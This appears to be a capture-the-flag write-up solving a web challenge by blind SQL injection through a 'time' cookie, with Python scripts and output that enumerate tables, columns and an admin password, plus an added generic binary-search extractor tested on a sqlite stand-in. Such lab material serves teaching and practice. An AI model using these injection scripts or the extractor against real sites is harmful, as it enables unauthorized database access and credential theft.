/
The first thing you see when you connect is this page.
<!--
2022-11-08 07:05:21
-->
<h2>Restricted area</h2>Hello stranger. Your IP is logging...<!-- if you access admin.php i will kick your ass -->
The page source contains the access time and a comment warning you not to visit admin.php. Let's go there anyway.
/admin.php
It asks for a Secret password. A wrong password gives "wrong password", but submitting an empty field or 0 shows nothing at all.
time cookie
There is a cookie named time, and its value is what appears as the time in the home page comment. Changing the cookie and refreshing changes the time in the comment; setting it to 0 and refreshing returns <script>location.href='./';</script>
and the cookie is reset.
This takes a bit of guessing, but the conclusion is that the value of the time
cookie ends up inside a SQL query and the query's result is rendered as the time in the comment, with the numeric result apparently counted as seconds. For example, setting the cookie to (select 1)
turns the time into 2070-01-01 09:00:01
.
Blind SQL Injection
Since the result of each query is reflected in the page, we can perform Blind SQL injection: a query whose count is exactly 1 renders as 09:00:01, and that string is our true/false oracle.
Number of tables
import requests

url = 'http://TARGET/'  # root of the challenge site (the writeup does not show the real host)

# get number of tables: the count is rendered as seconds, so 2 tables -> 09:00:02
query = '(select count(table_name) from information_schema.tables where table_schema = database())'
res = requests.get(url, cookies={'time': query})
print(res.text)
$ python3 solve.py
<!--
2070-01-01 09:00:02
-->
<h2>Restricted area</h2>Hello stranger. Your IP is logging...<!-- if you access admin.php i will kick your ass -->
There are two tables.
Length of table name
# length of first table name
# a count of exactly 1 renders as 09:00:01, which serves as the true/false oracle;
# the loop has no upper bound, so it never terminates if the oracle never fires
table_name_length = 1
while True:
    query = f'(select count(table_name) from (select table_name from information_schema.tables where table_schema = database() limit 0, 1) t where length(table_name) = {table_name_length})'
    res = requests.get(url, cookies={'time': query})
    if '09:00:01' in res.text:
        print(f'[+] Length of first table name: {table_name_length}')
        break
    else:
        table_name_length += 1

# length of second table name (same query, second row via limit 1, 1)
table_name_length = 1
while True:
    query = f'(select count(table_name) from (select table_name from information_schema.tables where table_schema = database() limit 1, 1) t where length(table_name) = {table_name_length})'
    res = requests.get(url, cookies={'time': query})
    if '09:00:01' in res.text:
        print(f'[+] Length of second table name: {table_name_length}')
        break
    else:
        table_name_length += 1
$ python3 solve.py
[+] Length of first table name: 13
[+] Length of second table name: 3
Table name
import string

# candidate characters; the writeup does not show this definition, so a
# lowercase/digit/underscore set is assumed (MySQL's default collation is
# case-insensitive, so '=' also matches uppercase letters)
chars = string.ascii_lowercase + string.digits + '_'

# first table name, one request per candidate character per position
table_name = ''
for i in range(13):
    for char in chars:
        query = f'(select count(table_name) from (select table_name from information_schema.tables where table_schema = database() limit 0, 1) t where substr(table_name, {i + 1}, 1) = \'{char}\')'
        res = requests.get(url, cookies={'time': query})
        if '09:00:01' in res.text:
            table_name += char
            print(table_name)
            break

# second table name
table_name = ''
for i in range(3):
    for char in chars:
        query = f'(select count(table_name) from (select table_name from information_schema.tables where table_schema = database() limit 1, 1) t where substr(table_name, {i + 1}, 1) = \'{char}\')'
        res = requests.get(url, cookies={'time': query})
        if '09:00:01' in res.text:
            table_name += char
            print(table_name)
            break
$ python3 solve.py
a
ad
adm
admi
admin
admin_
admin_a
admin_ar
admin_are
admin_area
admin_area_
admin_area_p
admin_area_pw
l
lo
log
The tables are admin_area_pw
and log
. admin_area_pw
probably holds what we are after, so let's use the same method to find out which columns it has.
Number of columns
# number of columns in admin_area_pw
query = '(select count(column_name) from information_schema.columns where table_name = \'admin_area_pw\')'
res = requests.get(url, cookies={'time': query})
print(res.text)
$ python3 solve.py
<!--
2070-01-01 09:00:01
-->
<h2>Restricted area</h2>Hello stranger. Your IP is logging...<!-- if you access admin.php i will kick your ass -->
admin_area_pw
has a single column.
Length of column name
# length of column name
column_name_length = 1
while True:
query = f'(select count(column_name) from (select column_name from information_schema.columns where table_name = \'admin_area_pw\') c where length(column_name) = {column_name_length})'
res = requests.get(url, cookies={'time': query})
if '09:00:01' in res.text:
print(f'[+] Length of column name: {column_name_length}')
break
else:
column_name_length += 1
$ python3 solve.py
[+] Length of column name: 2
Column name
# column name
column_name = ''
for i in range(2):
for char in chars:
query = f'(select count(column_name) from (select column_name from information_schema.columns where table_name = \'admin_area_pw\') c where substr(column_name, {i + 1}, 1) = \'{char}\')'
res = requests.get(url, cookies={'time': query})
if '09:00:01' in res.text:
column_name += char
print(column_name)
break
$ python3 solve.py
p
pw
Now we just need to recover the value stored in the pw
column.
Length of pw
# length of pw
pw_length = 1
while True:
query = f'(select count(pw) from (select pw from admin_area_pw) p where length(pw) = {pw_length})'
res = requests.get(url, cookies={'time': query})
if '09:00:01' in res.text:
print(f'[+] Length of pw: {pw_length}')
break
else:
pw_length += 1
$ python3 solve.py
[+] Length of pw: 17
pw
# pw
pw = ''
for i in range(17):
for char in chars:
query = f'(select count(pw) from (select pw from admin_area_pw) p where substr(pw, {i + 1}, 1) = \'{char}\')'
res = requests.get(url, cookies={'time': query})
if '09:00:01' in res.text:
pw += char
print(pw)
break
$ python3 solve.py
k
ku
kud
kudo
kudos
kudos_
kudos_t
kudos_to
kudos_to_
kudos_to_b
kudos_to_be
kudos_to_bei
kudos_to_beis
kudos_to_beist
kudos_to_beistl
kudos_to_beistla
kudos_to_beistlab
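The scripts above spend one request per candidate length and one per candidate character at each position. The block below is an added example, not code from the writeup: it generalizes the same count-of-one oracle into a binary-search extractor and runs it against a constructed sqlite3 stand-in for the vulnerable page, so it works offline. The real challenge presumably runs MySQL; make_simulated_page, BlindOracle, extract_string, SEED_PW and the use of sqlite's unicode() where MySQL would use ascii() are all this example's assumptions.

```python
import sqlite3
from typing import Callable

# Constructed stand-in for the challenge backend (assumption: not the real app).
SEED_PW = "kudos_to_beistlab"   # the value the writeup recovered


def make_simulated_page() -> Callable[[str], str]:
    """Mimic the challenge: the `time` cookie is evaluated as a SQL subquery and
    the numeric result is rendered as seconds after 09:00:00 in an HTML comment."""
    db = sqlite3.connect(":memory:")
    db.execute("create table admin_area_pw (pw text)")
    db.execute("insert into admin_area_pw values (?)", (SEED_PW,))
    db.execute("create table log (ip text)")

    def page(cookie_time: str) -> str:
        try:
            # the injection point: the cookie value is concatenated, not bound
            (n,) = db.execute(f"select {cookie_time}").fetchone()
            n = int(n or 0)
        except (sqlite3.Error, TypeError, ValueError):
            n = 0
        stamp = f"2070-01-01 {9 + n // 3600:02d}:{n // 60 % 60:02d}:{n % 60:02d}"
        return f"<!--\n{stamp}\n-->\n<h2>Restricted area</h2>Hello stranger. Your IP is logging..."

    return page


class BlindOracle:
    """Turn the page into a boolean oracle: a query that counts exactly one
    matching row renders as 09:00:01, as the writeup observed."""

    def __init__(self, page: Callable[[str], str], true_marker: str = "09:00:01"):
        self.page, self.true_marker, self.requests = page, true_marker, 0

    def __call__(self, query: str) -> bool:
        self.requests += 1
        return self.true_marker in self.page(query)


def extract_string(oracle: BlindOracle, row_subquery: str, column: str,
                   ord_fn: str = "unicode") -> str:
    """Recover `column` from the single row produced by `row_subquery`, using
    binary search on the length and on each character's code point instead of
    one request per candidate. ord_fn is sqlite's unicode(); use ascii() on MySQL."""

    def count_is_one(condition: str) -> bool:
        return oracle(f"(select count({column}) from ({row_subquery}) t where {condition})")

    # 1. length: invariant lo <= len <= hi, capped at 256 characters
    lo, hi = 0, 256
    while lo < hi:
        mid = (lo + hi) // 2
        if count_is_one(f"length({column}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    length = lo

    # 2. each character: binary search over the ASCII code point 0..127
    out = []
    for i in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if count_is_one(f"{ord_fn}(substr({column}, {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    oracle = BlindOracle(make_simulated_page())
    pw = extract_string(oracle, "select pw from admin_area_pw", "pw")
    print(f"{pw} recovered in {oracle.requests} requests")
```

Against the live target, replace the page function with one that sends the cookie via requests and returns res.text, and pass ord_fn='ascii'. Ordinal comparison is used rather than comparing substrings with > because under MySQL's default case-insensitive collations string order is not ASCII order (which is also why the writeup's = scan gets away with a lowercase-only charset). The length bound of 256 and the code-point bound of 127 are assumptions; a longer or non-ASCII value needs them raised.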
Solve
Enter the recovered value, kudos_to_beistlab, as the Secret password on /admin.php.